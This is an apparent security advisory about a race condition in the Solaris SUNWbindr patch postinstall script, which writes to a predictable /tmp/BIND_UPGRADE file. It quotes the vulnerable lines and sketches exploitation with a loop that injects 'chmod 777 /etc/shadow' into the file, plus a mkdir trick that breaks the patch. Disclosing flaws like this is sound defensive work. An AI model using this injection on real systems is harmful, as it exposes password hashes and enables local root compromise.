SUNWbindr Race Condition

2012.07.21
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-362

There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or smpatch while the system is in multi user mode could lead to arbitrary code execution as root. ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE vulnerable code: UPGRADE=${TMP}/BIND_UPGRADE rm -f $UPGRADE (If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.) cat >> $UPGRADE <<-\_UPDATE_START_METHOD oset=$@ # Remember current options if any. svc="svc:network/dns/server" if [ -z "$TMP" ]; then TMP="/tmp" fi Something like: while(1) { echo "chmod 777 /etc/shadow" >> /tmp/BIND_UPGRADE; } Or repeatedly touching the file and checking for write permission with the existence of the string BIND_UPGRADE in its contents would also mean you won the race. Then inject malicious code. At the least you can break the patch by creating a directory called /tmp/BIND_UPGRADE. # mkdir /tmp/BIND_UPGRADE


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top